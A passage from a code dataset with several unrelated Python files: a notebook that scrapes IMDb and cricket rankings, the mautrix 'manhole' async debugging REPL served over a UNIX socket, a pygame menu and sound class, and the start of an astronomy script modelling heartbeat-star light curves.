name, rating, year of release) and make data frame.\n\n# In[54]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[55]:\n\n\npage= requests.get(\"https://www.imdb.com/list/ls079077479/\") \npage\n\n\n# In[56]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[58]:\n\n\ndef get_movie_name(soup):\n \n selection_class=\"lister-item-header\"\n movie_name_tags=soup.find_all('h3',{'class':selection_class})\n movie_name=[]\n\n for tag in movie_name_tags:\n title = tag.find('a').text\n movie_name.append(title)\n \n \n return movie_name\n\n\n# In[59]:\n\n\nname = get_movie_name(soup)\nname[:50]\n\n\n# In[60]:\n\n\ndef get_movie_rating(soup):\n rating_selector=\"ipl-rating-widget\" \n movie_rating_tags=soup.find_all('div',{'class':\"ipl-rating-star small\"})\n movie_rating_tagss=[]\n for tag in movie_rating_tags:\n movie_rating_tagss.append(tag.get_text().strip())\n return movie_rating_tagss\n\n\n# In[61]:\n\n\nratings = get_movie_rating(soup)\nratings[:50]\n\n\n# In[62]:\n\n\ndef get_movie_year(soup):\n year_selector = \"lister-item-year text-muted unbold\" \n movie_year_tags=soup.find_all('span',{'class':year_selector})\n movie_year_tagss=[]\n for tag in movie_year_tags:\n movie_year_tagss.append(tag.get_text().strip()[1:5])\n return movie_year_tagss\n\n\n# In[63]:\n\n\nyears = get_movie_year(soup)\nyears[:50]\n\n\n# In[64]:\n\n\nimport pandas as pd \ndf = pd.DataFrame({'Name':name,'ratings':ratings,'year':years})\ndf.head(50)\n\n\n# Top 10 ODI teams in women’s cricket along with the records for matches, points and rating.\n\n# In[65]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[66]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/womens/team-rankings/odi')\npage\n\n\n# In[67]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[71]:\n\n\nTeam=[]\n\n\n# In[72]:\n\n\nfor i in soup.find_all('span',class_='u-hide-phablet'):\n Team.append(i.text)\nTeam\n\n\n# In[73]:\n\n\nmatch=[]\n\n\n# In[74]:\n\n\nfor i in soup.find_all('td',class_='table-body__cell u-center-text'):\n match.append(i.text)\nmatch\n\n\n# In[75]:\n\n\nrating=[]\nfor i in soup.find_all('td',class_=\"table-body__cell u-text-right rating\"):\n rating.append(i.text)\nrating\n\n\n# Top 10 women’s ODI Batting players along with the records of their team and rating\n\n# In[76]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[77]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/womens/player-rankings/odi/batting')\npage\n\n\n# In[78]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[80]:\n\n\nplayer_name=[]\n\nfor i in soup.find_all('td',class_='table-body__cell rankings-table__name name'):\n player_name.append(i.text)\n\nplayer_name\n\n\n# In[81]:\n\n\nTeam=[]\nfor i in soup.find_all('span',class_='table-body__logo-text'):\n Team.append(i.text)\nTeam\n\n\n# In[82]:\n\n\nRating=[]\nfor i in soup.find_all('td',class_='table-body__cell rating'):\n Rating.append(i.text)\nRating\n\n\n# In[84]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"Player Name\":player_name, \"Team\": Team, \"Rating\":Rating})\ndf.head(10)\n\n\n# \n# Top 10 women’s ODI all-rounder along with the records of their team and rating\n\n# In[85]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[86]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/womens/player-rankings/odi/all-rounder')\npage\n\n\n# In[87]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[88]:\n\n\nplayer_name=[]\nfor i in soup.find_all('td',class_='table-body__cell rankings-table__name name'):\n 
player_name.append(i.text)\nplayer_name\n\n\n# In[89]:\n\n\nTeam=[]\nfor i in soup.find_all('span',class_='table-body__logo-text'):\n Team.append(i.text)\nTeam\n\n\n# In[90]:\n\n\nRating=[]\nfor i in soup.find_all('td',class_='table-body__cell rating'):\n Rating.append(i.text)\nRating\n\n\n# In[91]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"Player Name\":player_name, \"Team\": Team, \"Rating\":Rating})\ndf.head(10)\n\n\n# \n# Top 10 ODI teams in men’s cricket along with the records for matches, points and rating\n\n# In[93]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[94]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/mens/team-rankings/odi')\npage\n\n\n# In[95]:\n\n\npage=BeautifulSoup(page.content)\npage\n\n\n# In[96]:\n\n\ncountry=[]\nfor i in page.find_all('span',class_='u-hide-phablet'):\n country.append(i.text)\n\ncountry\n\n\n# In[97]:\n\n\nmatch=[]\nfor i in page.find_all('td',class_='table-body__cell u-center-text'):\n match.append(i.text)\nmatch\n\n\n# In[98]:\n\n\nrating=[]\nfor i in page.find_all('td',class_='table-body__cell u-text-right rating'):\n rating.append(i.text)\nrating\n\n\n# \n# Top 10 ODI Batsmen along with the records of their team and rating\n\n# In[99]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[100]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/mens/player-rankings/odi/batting')\npage\n\n\n# In[101]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[102]:\n\n\nplayer_name=[]\nfor i in soup.find_all('td',class_='table-body__cell rankings-table__name name'):\n player_name.append(i.text)\nplayer_name\n\n\n# In[103]:\n\n\nTeam=[]\nfor i in soup.find_all(\"span\",class_='table-body__logo-text'):\n Team.append(i.text)\nTeam\n\n\n# In[104]:\n\n\nRating=[]\nfor i in soup.find_all('td',class_='table-body__cell rating'):\n Rating.append(i.text)\nRating\n\n\n# In[105]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"Team\": Team, \"Rating\":Rating, \"player_name\":player_name})\ndf.head(10)\n\n\n# Top 10 ODI bowlers along with the records of their team and rating.\n\n# In[106]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[107]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/mens/player-rankings/odi/bowling')\npage\n\n\n# In[108]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[109]:\n\n\nplayer_name=[]\nfor i in soup.find_all('td',class_='table-body__cell rankings-table__name name'):\n player_name.append(i.text)\nplayer_name\n\n\n# In[110]:\n\n\nTeam=[]\nfor i in soup.find_all('span',class_='table-body__logo-text'):\n Team.append(i.text)\nTeam\n\n\n# In[111]:\n\n\nRating=[]\nfor i in soup.find_all('td',class_='table-body__cell rating'):\n Rating.append(i.text)\n\nRating\n\n\n# In[113]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"Player Name\":player_name, \"Team\": Team, \"Rating\":Rating})\ndf.head(10)\n\n\n# Write a python program to display all the header tags from wikipedia.org and make data frame. 
\n\n# In[116]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[117]:\n\n\npage= requests.get(\"https://en.wikipedia.org/wiki/Main_Page\")\npage\n\n\n# In[118]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[119]:\n\n\ntitles = soup.find_all(['h1', 'h2','h3','h4','h5','h6'])\n\n\n# In[120]:\n\n\ntitles\n\n\n# In[121]:\n\n\nprint('List all the header tags :', *titles, sep='\\n\\n')\n\n\n# In[122]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"List\":titles})\ndf\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"chhetrishivangi/Internship","sub_path":"Untitled1.py","file_name":"Untitled1.py","file_ext":"py","file_size_in_byte":12099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3688278646","text":"from typing import Any, Tuple, Optional, Dict, Union, List, Set, Callable, Type\nfrom socket import SOL_SOCKET, SO_PEERCRED\nfrom abc import ABC, abstractmethod\nfrom io import BytesIO, StringIO\nfrom types import CodeType\nimport contextlib\nimport functools\nimport traceback\nimport logging\nimport asyncio\nimport struct\nimport codeop\nimport pwd\nimport ast\nimport sys\nimport os\n\nlog = logging.getLogger(\"mau.manhole\")\n\n\nclass AwaitTransformer(ast.NodeTransformer):\n def visit_Call(self, node: ast.Call) -> Union[ast.Call, ast.Await]:\n if ((not isinstance(node.func, ast.Name) or node.func.id != AWAIT_FUNC_NAME\n or len(node.args) != 1 or len(node.keywords) != 0)):\n return node\n return ast.copy_location(ast.Await(value=node.args[0]), node)\n\n\nclass AwaitFallback:\n def __str__(self) -> str:\n return \"magical await() AST transformer\"\n\n def __repr__(self) -> str:\n return \"magical await() AST transformer\"\n\n def __call__(self, *args, **kwargs) -> Any:\n if len(args) != 1:\n raise TypeError(f\"{AWAIT_FUNC_NAME}() takes 1 positional argument \"\n f\"but {len(args)} were given\")\n elif len(kwargs) > 0:\n raise TypeError(f\"{AWAIT_FUNC_NAME}() got an unexpected keyword argument \"\n f\"'{list(kwargs.keys())[0]}'\")\n raise RuntimeError(\"AST transforming appears to have failed\")\n\n\n# Python 3.6 doesn't even support parsing top-level awaits, so we use an AST transformer to\n# convert `await(coro)` into `await coro`.\n# Python 3.7 and up allow parsing top-level awaits and only throw errors if you try to execute them.\nAWAIT_TRANSFORM = sys.version_info < (3, 7)\nAWAIT_FUNC_NAME = \"await\"\nAWAIT_FALLBACK = AwaitFallback()\n\nASYNC_EVAL_WRAPPER: str = \"\"\"\nasync def __eval_async_expr():\n try:\n pass\n finally:\n globals().update(locals())\n\"\"\"\n\n\ndef asyncify(tree: ast.AST, wrapper: str = ASYNC_EVAL_WRAPPER, module: str = \"\") -> CodeType:\n # TODO in python 3.8+, switch to ast.PyCF_ALLOW_TOP_LEVEL_AWAIT\n if AWAIT_TRANSFORM:\n AwaitTransformer().visit(tree)\n insert_returns(tree.body)\n wrapper_node: ast.AST = ast.parse(wrapper, \"\", \"single\")\n method_stmt = wrapper_node.body[0]\n try_stmt = method_stmt.body[0]\n try_stmt.body = tree.body\n return compile(wrapper_node, module, \"single\")\n\n\n# From https://gist.github.com/nitros12/2c3c265813121492655bc95aa54da6b9\ndef insert_returns(body: List[ast.AST]) -> None:\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n elif isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n elif isinstance(body[-1], (ast.With, ast.AsyncWith)):\n insert_returns(body[-1].body)\n\n\nclass StatefulCommandCompiler(codeop.CommandCompiler):\n \"\"\"A command 
compiler that buffers input until a full command is available.\"\"\"\n\n buf: BytesIO\n wrapper: str = ASYNC_EVAL_WRAPPER\n\n def __init__(self) -> None:\n super().__init__()\n self.compiler = functools.partial(compile, optimize=1,\n flags=ast.PyCF_ONLY_AST | codeop.PyCF_DONT_IMPLY_DEDENT)\n self.buf = BytesIO()\n\n def is_partial_command(self) -> bool:\n return bool(self.buf.getvalue())\n\n def __call__(self, source: bytes, **kwargs: Any) -> Optional[CodeType]:\n buf = self.buf\n if self.is_partial_command():\n buf.write(b\"\\n\")\n buf.write(source)\n\n code = self.buf.getvalue().decode(\"utf-8\")\n codeobj = super().__call__(code, **kwargs)\n\n if codeobj:\n self.reset()\n return asyncify(codeobj, wrapper=self.wrapper)\n return None\n\n def reset(self) -> None:\n self.buf.seek(0)\n self.buf.truncate(0)\n\n\nclass Interpreter(ABC):\n @abstractmethod\n def __init__(self, namespace: Dict[str, Any], banner: Union[bytes, str],\n loop: asyncio.AbstractEventLoop) -> None:\n pass\n\n @abstractmethod\n def close(self) -> None:\n pass\n\n @abstractmethod\n async def __call__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:\n pass\n\n\nclass AsyncInterpreter(Interpreter):\n \"\"\"An interactive asynchronous interpreter.\"\"\"\n\n reader: asyncio.StreamReader\n writer: asyncio.StreamWriter\n namespace: Dict[str, Any]\n banner: bytes\n compiler: StatefulCommandCompiler\n loop: asyncio.AbstractEventLoop\n running: bool\n\n def __init__(self, namespace: Dict[str, Any], banner: Union[bytes, str],\n loop: asyncio.AbstractEventLoop) -> None:\n super().__init__(namespace, banner, loop)\n self.namespace = namespace\n self.banner = banner if isinstance(banner, bytes) else str(banner).encode(\"utf-8\")\n self.compiler = StatefulCommandCompiler()\n self.loop = loop\n\n async def send_exception(self) -> None:\n \"\"\"When an exception has occurred, write the traceback to the user.\"\"\"\n self.compiler.reset()\n\n exc = traceback.format_exc()\n self.writer.write(exc.encode(\"utf-8\"))\n\n await self.writer.drain()\n\n async def execute(self, codeobj: CodeType) -> Tuple[Any, str]:\n exec(codeobj, self.namespace)\n with contextlib.redirect_stdout(StringIO()) as buf:\n value = await eval(\"__eval_async_expr()\", self.namespace)\n\n return value, buf.getvalue()\n\n async def handle_one_command(self) -> None:\n \"\"\"Process a single command. May have many lines.\"\"\"\n\n while True:\n await self.write_prompt()\n codeobj = await self.read_command()\n\n if codeobj is not None:\n await self.run_command(codeobj)\n return\n\n async def run_command(self, codeobj: CodeType) -> None:\n \"\"\"Execute a compiled code object, and write the output back to the client.\"\"\"\n try:\n value, stdout = await self.execute(codeobj)\n except Exception:\n await self.send_exception()\n return\n else:\n await self.send_output(value, stdout)\n\n async def write_prompt(self) -> None:\n writer = self.writer\n\n if self.compiler.is_partial_command():\n writer.write(b\"... 
\")\n else:\n writer.write(b\">>> \")\n\n await writer.drain()\n\n async def read_command(self) -> Optional[CodeType]:\n \"\"\"Read a command from the user line by line.\n\n Returns a code object suitable for execution.\n \"\"\"\n\n reader = self.reader\n\n line = await reader.readline()\n if line == b\"\":\n raise ConnectionResetError()\n\n try:\n # skip the newline to make CommandCompiler work as advertised\n codeobj = self.compiler(line.rstrip(b\"\\n\"))\n except SyntaxError:\n await self.send_exception()\n return None\n\n return codeobj\n\n async def send_output(self, value: str, stdout: str) -> None:\n \"\"\"Write the output or value of the expression back to user.\n\n >>> 5\n 5\n >>> print('cash rules everything around me')\n cash rules everything around me\n \"\"\"\n\n writer = self.writer\n\n if value is not None:\n writer.write(f\"{value!r}\\n\".encode(\"utf-8\"))\n\n if stdout:\n writer.write(stdout.encode(\"utf-8\"))\n\n await writer.drain()\n\n def close(self) -> None:\n if self.running:\n self.writer.close()\n self.running = False\n\n async def __call__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:\n \"\"\"Main entry point for an interpreter session with a single client.\"\"\"\n self.reader = reader\n self.writer = writer\n self.running = True\n\n if self.banner:\n writer.write(self.banner)\n await writer.drain()\n\n while self.running:\n try:\n await self.handle_one_command()\n except ConnectionResetError:\n writer.close()\n self.running = False\n break\n except Exception:\n log.exception(\"Exception in manhole REPL\")\n self.writer.write(traceback.format_exc())\n await self.writer.drain()\n\n\nclass InterpreterFactory:\n namespace: Dict[str, Any]\n banner: bytes\n loop: asyncio.AbstractEventLoop\n interpreter_class: Type[Interpreter]\n clients: List[Interpreter]\n whitelist: Set[int]\n _conn_id: int\n\n def __init__(self, namespace: Dict[str, Any], banner: Union[bytes, str],\n interpreter_class: Type[Interpreter], loop: asyncio.AbstractEventLoop,\n whitelist: Set[int]) -> None:\n self.namespace = namespace or {}\n self.banner = banner\n self.loop = loop\n self.interpreter_class = interpreter_class\n self.clients = []\n self.whitelist = whitelist\n self._conn_id = 0\n\n @property\n def conn_id(self) -> int:\n self._conn_id += 1\n return self._conn_id\n\n async def __call__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter\n ) -> None:\n sock = writer.transport.get_extra_info(\"socket\")\n creds = sock.getsockopt(SOL_SOCKET, SO_PEERCRED, struct.calcsize('3i'))\n pid, uid, gid = struct.unpack('3i', creds)\n user_info = pwd.getpwuid(uid)\n username = f\"{user_info.pw_name} ({uid})\" if user_info and user_info.pw_name else uid\n if len(self.whitelist) > 0 and uid not in self.whitelist:\n writer.write(b\"You are not whitelisted to use the manhole.\")\n log.warning(f\"Non-whitelisted user {username} tried to connect from PID {pid}\")\n await writer.drain()\n writer.close()\n return\n\n namespace = {**self.namespace}\n if AWAIT_TRANSFORM:\n namespace[AWAIT_FUNC_NAME] = AWAIT_FALLBACK\n interpreter = self.interpreter_class(namespace=namespace, banner=self.banner,\n loop=self.loop)\n namespace[\"exit\"] = interpreter.close\n self.clients.append(interpreter)\n conn_id = self.conn_id\n\n log.info(f\"Manhole connection OPENED: {conn_id} from PID {pid} by {username}\")\n await asyncio.ensure_future(interpreter(reader, writer))\n log.info(f\"Manhole connection CLOSED: {conn_id} from PID {pid} by {username}\")\n 
self.clients.remove(interpreter)\n\n\nasync def start_manhole(path: str, banner: str = \"\", namespace: Optional[Dict[str, Any]] = None,\n loop: asyncio.AbstractEventLoop = None, whitelist: Set[int] = None,\n ) -> Tuple[asyncio.AbstractServer, Callable[[], None]]:\n \"\"\"\n Starts a manhole server on a given UNIX address.\n\n Args:\n path: The path to create the UNIX socket at.\n banner: The banner to show when clients connect.\n namespace: The globals to provide to connected clients.\n loop: The asyncio event loop to use.\n whitelist: List of user IDs to allow connecting.\n \"\"\"\n loop = loop or asyncio.get_event_loop()\n factory = InterpreterFactory(namespace=namespace, banner=banner,\n interpreter_class=AsyncInterpreter, loop=loop,\n whitelist=whitelist)\n server = await asyncio.start_unix_server(factory, path=path, loop=loop)\n os.chmod(path, 0o666)\n\n def stop():\n for client in factory.clients:\n client.close()\n server.close()\n\n return server, stop\n","repo_name":"Ma27/mautrix-python","sub_path":"mautrix/util/manhole.py","file_name":"manhole.py","file_ext":"py","file_size_in_byte":11696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"70514848108","text":"import pygame.font\nimport time\nfrom menu import *\nfrom PIL import Image\nimport path\n\nclass Game():\n def __init__(self,screen):\n pygame.init()\n\n self.running = True\n self.playing = False\n self.setup = True\n self.first_setup = True\n self.first_launch = True\n self.sound = Sound()\n self.button = Button(self, None, self.sound,)\n self.UP_KEY, self.DOWN_KEY, self.START_KEY, self.BACK_KEY, self.EXIT_KEY = False,False,False,False,False\n self.display = screen\n self.display_w, self.display_h = self.display.get_width(), self.display.get_height()\n path_parts = path.schrift.split('/')\n self.font_name = os.path.join(os.path.dirname(__file__), *path_parts, \"BreatheFireIi.ttf\")\n self.black, self.white = (0,0,0),(255,255,255)\n self.main_menu = MainMenu(self,self.sound,self.button)\n self.options = OptionsMenu(self,self.sound,self.button)\n self.controls = ControlsMenu(self, self.sound, self.button)\n self.credits = CreditsMenu(self,self.sound,self.button)\n self.quit = QuitMenu(self,self.sound,self.button)\n self.ending = EndScreen(self, self.sound, self.button)\n self.victory = VictoryScreen(self, self.sound, self.button)\n self.curr_menu = self.main_menu\n self.prev_menu = self.main_menu\n\n self.player_spawn = (0,0)\n self.dealer_spawn = (0,0)\n self.game_is_won = False\n self.reset_time = 0\n self.paused = False\n self.bg = False # bg = Background, for the background image in menu\n\n self.seed = int(time.time()) # Konvertiere das Datum und die Uhrzeit in einen Seed\n self.width = 150\n self.height = 150\n\n\n def check_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running, self.playing = False, False\n self.curr_menu.run_display = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n self.START_KEY = True\n if event.key == pygame.K_BACKSPACE:\n self.BACK_KEY = True\n if event.key == pygame.K_DOWN or event.key == pygame.K_s:\n self.DOWN_KEY = True\n if event.key == pygame.K_UP or event.key == pygame.K_w:\n self.UP_KEY = True\n if event.key == pygame.K_ESCAPE:\n self.EXIT_KEY = True\n\n def reset_keys(self):\n self.UP_KEY, self.DOWN_KEY, self.START_KEY, self.BACK_KEY,self.EXIT_KEY = False, False, False, False,False\n\n def draw_text(self, text, size, x, y, clickable_button = True):\n font = 
pygame.font.Font(self.font_name, size)\n text_surface = font.render(text, True, self.white)\n text_rect = text_surface.get_rect()\n text_rect.center = (x, y)\n\n # use clickable_button = False to exclude from being added, so not being a clickable button\n if text not in Button.all_buttons and clickable_button:\n button = Button(self,text,x,y)\n button.name_rect = text_rect\n button.all_buttons[text] = button # Add the button to the class-level all_buttons dictionary\n button.set_button_pos(x,y)\n\n self.display.blit(text_surface, text_rect)\n\n def draw_text_loop(self,*args,size, x,y, distance, add = True,):\n for text in args:\n self.draw_text(text,size,x,y, add)\n y += distance\n\n def background_screenshot(self):\n self.running = True\n self.paused = True\n screenshot = pygame.surfarray.array3d(self.display)\n screenshot = screenshot.transpose([1, 0, 2])\n img = Image.fromarray(screenshot)\n img.save(f\"{path.weiteres}bg.png\")\n self.bg = True\n\nclass Button():\n all_buttons = {}\n\n def __init__(self, game, name, sound, x=0,y=0):\n self.game = game\n self.button_name = name\n self.sound = sound\n self.clicked = False\n self.already_hovered= False\n self.once = True\n self.name_rect = None\n self.button_pos = (x,y)\n self.button_rects = []\n\n def set_button_name(self, name):\n self.button_name = name\n\n def get_button_name(self):\n return self.button_name\n\n def set_button_pos(self,x,y):\n self.button_pos = (x,y)\n\n def get_button_pos(self, button):\n return self.button_pos\n\n def mouse_click(self):\n\n for name, button in Button.all_buttons.items():\n rect_value = button.name_rect\n mouse_pos = pygame.mouse.get_pos()\n\n if button.name_rect is not None and rect_value.collidepoint(mouse_pos):\n\n if not button.already_hovered:\n self.sound.play_sound(\"UPDOWN\")\n pygame.cursors.Cursor(pygame.SYSTEM_CURSOR_HAND)\n button.already_hovered = True\n\n if pygame.mouse.get_pressed()[0] == 1 and self.clicked == False:\n\n self.set_button_name(button.button_name)\n self.set_button_pos(*button.get_button_pos(self))\n self.sound.play_sound(\"UPDOWN\")\n self.clicked = True\n pygame.mouse.set_cursor(pygame.SYSTEM_CURSOR_ARROW)\n return True\n else:\n button.already_hovered = False\n\n if pygame.mouse.get_pressed()[0] == 0:\n self.clicked = False\n pygame.cursors.Cursor(pygame.SYSTEM_CURSOR_ARROW)\n\n\nclass Sound():\n\n music_volume = [1]\n sound_volume = [1]\n\n def __init__(self):\n pygame.mixer.init()\n self.currently_playing = None\n self.playing_music = False\n self.parent_dir = os.path.dirname(__file__)\n path_parts = path.sound.split('/')\n self.sound_dir = os.path.join(self.parent_dir, *path_parts)\n self.voice_channel = pygame.mixer.Channel(0)\n self.footsteps_channel = pygame.mixer.Channel(1)\n self.current_footsteps = True\n self.sound_effects = {}\n self.music_tracks = {}\n\n self.sound_setup()\n\n def search_file(self, file_name):\n for path, _, files in os.walk(self.sound_dir):\n if file_name in files:\n return os.path.join(path, file_name)\n\n\n def add_sound_effect(self, event, sound_filename):\n self.sound_effects[event] = sound_filename\n\n def add_music_track(self, event, music_filename):\n self.music_tracks[event] = music_filename\n\n def play_sound(self, event):\n if event in self.sound_effects:\n sound_file = pygame.mixer.Sound(self.search_file(self.sound_effects[event]))\n sound_file.set_volume(Sound.sound_volume[0])\n sound_file.play()\n\n def play_music(self, event):\n music_filename = self.music_tracks[event]\n 
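# apply the shared music volume before loading or switching tracks\n        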
pygame.mixer.music.set_volume(Sound.music_volume[0])\n\n if pygame.mixer.music.get_busy():\n if not self.currently_playing == music_filename: #keep it from restarting the music when the loop is called again\n pygame.mixer.music.unload()\n pygame.mixer.music.load(self.search_file(music_filename))\n pygame.mixer.music.play(-1, fade_ms = 1500)\n else:\n pygame.mixer.music.load(self.search_file(music_filename))\n pygame.mixer.music.play(-1)\n self.currently_playing = music_filename\n\n def play_voiceline(self,line):\n self.voice_channel.set_volume(Sound.sound_volume[0] * 0.9)\n voice_line = pygame.mixer.Sound(self.search_file(self.sound_effects[line]))\n if self.voice_channel.get_busy():\n self.voice_channel.stop()\n self.voice_channel.play(voice_line)\n\n def play_footsteps(self, stop=False):\n self.footsteps_channel.set_volume(Sound.sound_volume[0] * 0.4)\n if stop:\n self.footsteps_channel.stop()\n elif not self.footsteps_channel.get_busy():\n if self.current_footsteps: #switching between two sets of footsteps\n footsteps_sound = pygame.mixer.Sound(self.search_file(self.sound_effects[\"Footsteps\"]))\n else:\n footsteps_sound = pygame.mixer.Sound(self.search_file(self.sound_effects[\"Footsteps2\"]))\n self.current_footsteps = not self.current_footsteps\n self.footsteps_channel.play(footsteps_sound)\n\n def sound_setup(self):\n pygame.mixer.set_num_channels(16)\n\n ### Music ###\n self.add_music_track(\"Main Menu\" , \"1_BETT_Menue.wav\")\n self.add_music_track(\"level1\", \"2_BETT_Korianderworld.wav\")\n self.add_music_track(\"Credits\", \"4_BETT_Credits.wav\")\n self.add_music_track(\"SaveSpace\",\"Save_Space_atmo.wav\")\n self.add_music_track(\"Dungeon\",\"Dungeon_ATMO_v1.0.wav\")\n self.add_music_track(\"Moonlight\",\"Moonlight_ATMO_v1.0.wav\")\n self.add_music_track(\"Horns\",\"3_BETT_Underwaterworld2_Horns.wav\")\n\n ### Menu ###\n self.add_sound_effect(\"Gong\", \"2_SOUND_Gong_Einstieg.wav\")\n self.add_sound_effect(\"UPDOWN\", \"1_1_SOUND_Menue_YES.wav\")\n\n ### Items ###\n self.add_sound_effect(\"ItemPickUp\", \"paper_sound.wav\")\n self.add_sound_effect(\"CoinPickUp\", \"SOUND_Bling_Money1_Clear_Short.wav\")\n self.add_sound_effect(\"Echo1\",\"SOUND_Echolot_V1.wav\")\n self.add_sound_effect(\"Echo2\", \"SOUND_Echolot_V2.wav\")\n self.add_sound_effect(\"EchoPickUp\", \"SOUND_Echolot_V3.wav\")\n self.add_sound_effect(\"flame1\", \"SOUND_Fire_Flame_V1.wav\")\n self.add_sound_effect(\"flame2\", \"SOUND_Fire_Flame_V2.wav\")\n self.add_sound_effect(\"RangeUp\", \"swoosh_effect_up_shorted.wav\")\n self.add_sound_effect(\"RangeDown\", \"swoosh_effect_down_shorted.wav\")\n self.add_sound_effect(\"Key\",\"getting_key.wav\")\n self.add_sound_effect(\"DoorOpen\",\"door_open.wav\")\n self.add_sound_effect(\"DoorClosed\",\"closed_door_sound.wav\")\n self.add_sound_effect(\"FuelCharge\",\"shield_recharge.wav\")\n\n ### SHOP ###\n self.add_sound_effect(\"BuyItem\", \"SOUND_SHOP_Selection_High.wav\")\n self.add_sound_effect(\"noMoney\", \"SOUND_SHOP_No_Money.wav\")\n self.add_sound_effect(\"ShopAnytime\", \"Merchant_quote_-_Come_back_anytime-Kopie.wav\")\n self.add_sound_effect(\"ShopNoMoney\", \"Merchant_quote_-_Not_enough_cash,_stranger.ogg\")\n self.add_sound_effect(\"ShopThankYou\", \"Merchant_quote_-_Thank_you.ogg\")\n self.add_sound_effect(\"ShopBuying\", \"Merchant_quote_-_What're_ya_buyin'.ogg\")\n\n ### Ending ###\n self.add_sound_effect(\"SlowDeath\", \"darkest-dungeon-the-slow-death.mp3\")\n self.add_sound_effect(\"Overconfidence\", 
\"darkest-dungeon-remind-yourself-that-overconfidence.mp3\")\n self.add_sound_effect(\"Slowly\", \"darkest-dungeon-slowly-gently-1.mp3\")\n self.add_sound_effect(\"NoHope\", \"darkest-dungeon-there-can-be-no-hope-in-this-hell.mp3\")\n self.add_sound_effect(\"Dissappointment\", \"more-dust-more-ashes-more-disappointment.mp3\")\n\n ### Victory ###\n self.add_sound_effect(\"Impressive\", \"darkest-dungeon-impressive.mp3\")\n self.add_sound_effect(\"VictorySound\", \"winning_sound.wav\")\n\n ### Footsteps ###\n self.add_sound_effect(\"Footsteps\", \"single_footstep__1_.wav\")\n self.add_sound_effect(\"Footsteps2\", \"single_footstep__2_.wav\")\n","repo_name":"conradbader/das-verreckte-labyrinth","sub_path":"gameclass.py","file_name":"gameclass.py","file_ext":"py","file_size_in_byte":11451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7315652193","text":"#-*-coding:utf-8-*-\nfrom astropy.io import fits\nimport os\nimport sys\nimport glob\nimport numpy as np\nfrom PyAstronomy import pyasl\nimport matplotlib.pyplot as plt\nimport emcee\nimport corner\nimport batman\nfrom mpfit.mpfit import mpfit\n\nper = 2.666965\n\n\"\"\"\necc 離心率\ninc 傾斜(ラジアン)\nomega ペリアストロン(ラジアン)\nt0 ハートビートの開始位置\nS ハートビートの振幅\nC ハートビートのy軸位置\np 補正関数の係数\nq 補正関数の初期位相\ntp primary eclipseの中心位置\nrp 中心星に対しての2体目の星の半径\na semi-major axis\nq1 lim darkning係数1\nq2 lim darkning係数2 https://academic.oup.com/mnras/article/435/3/2152/1024138\nfp 2体目の星の光度\nts secondary eclipseの中心位置\n\"\"\"\n\n\nclass HeartBeatModel():\n def __init__(self, ecc, inc, omega, t0, S, C, p, q, rp, a, q1, q2, fp):\n self.ecc = ecc\n self.inc = inc\n self.omega = omega\n self.t0 = t0\n self.S = S\n self.C = C\n self.p = p\n self.q = q\n\n def t2ma(self, t):\n ma = (t - self.t0) / per * 2. * np.pi\n return ma\n\n def ma2ea(self, ma):\n ks = pyasl.MarkleyKESolver()\n if isinstance(ma, float):\n ea = ks.getE(ma, self.ecc)\n else:\n ea_list = [ks.getE(_ma, self.ecc) for _ma in ma]\n ea = np.array(ea_list)\n return ea\n\n def ea2ta(self, ea):\n #ta = 2. * np.arctan2(np.sqrt(1 - self.ecc) * np.cos(ea / 2.), np.sqrt(1 + self.ecc) * np.sin(ea / 2.))\n ta = 2. * np.arctan(np.sqrt((1. + self.ecc) / (1. - self.ecc)) * np.tan(ea / 2.))\n return ta\n\n def ta2ea(self, ta):\n ea = 2. * np.arctan(np.sqrt((1. - self.ecc) / (1. + self.ecc)) * np.tan(ta / 2.))\n return ea\n\n def ea2ma(self, ea):\n ma = ea - self.ecc * np.sin(ea)\n return ma\n\n def ma2t(self, ma):\n t = ma * per / 2. / np.pi + self.t0\n t = np.where(t >= per, t - per, t)\n return t\n\n def t2ta(self, t):\n ma = self.t2ma(t)\n ea = self.ma2ea(ma)\n ta = 